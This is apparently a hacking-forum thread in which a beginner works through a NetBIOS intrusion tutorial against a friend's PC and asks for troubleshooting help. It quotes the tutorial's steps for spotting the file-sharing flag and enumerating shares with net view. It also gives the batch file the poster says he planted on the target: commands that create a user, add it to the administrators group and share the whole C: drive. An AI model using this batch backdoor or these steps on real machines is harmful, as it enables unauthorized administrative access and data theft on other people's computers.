Netbios hacking
Hey im quite new on this website and im spending much time in reading and learning how to hack. I was reading the article about hacking someones harddisk, and i came to this point
Name Type Status
user <00> UNIQUE Registered workgroup <00> GROUP Registered user <03> UNIQUE Registered user <20> UNIQUE Registered
MAC Address = 00-02-44-14-23-E6
Note the <20>. It shows that the victim has enabled the file and printer sharing. So other wise if the <20> isnt there then its also not vulnerable.
I did this step and i got the same message witch showed the system of my victem is vulnerable (victem is in my case a good friend witch allowed me to try and hack him)
bUt now i stumbled acros the next step
Next we will use cmd. Type in the following: net view \127.0.0.1
If you get this then your good again:
Shared resources at \203.195.136.156 ComputerNameGoesHere
Share name Type Used as Comment
When i type: net view \127.0.0.1 it tells me: system error 123 when i type: net view\127.0.0.1 i come into some sort of menu:
net [ACCOUNTS | COMPUTERS | CONFIG | CONTINUE | FILE | GROUP etc. etc.
does anyone know what i am doing wrong?:(
I think it's just about the slash in front of the IP ^^
You'll find some examples here: http://www.ss64.com/nt/net_share.html
Ok i started with a new aprouch.
I managed to get a bat file into the victims system. The batfile contained the following:
net user redroest /add net localgroup administrators redroest /add net share system=C:\ /unlimited
In my own command prompt I typed the following:
net use \\ip redroest
Now it tells me: ''system error 53 has occured'' What am i doing wrong? I tryed many things but nothing worked. (When I ping the ip it shows a near perfect connection)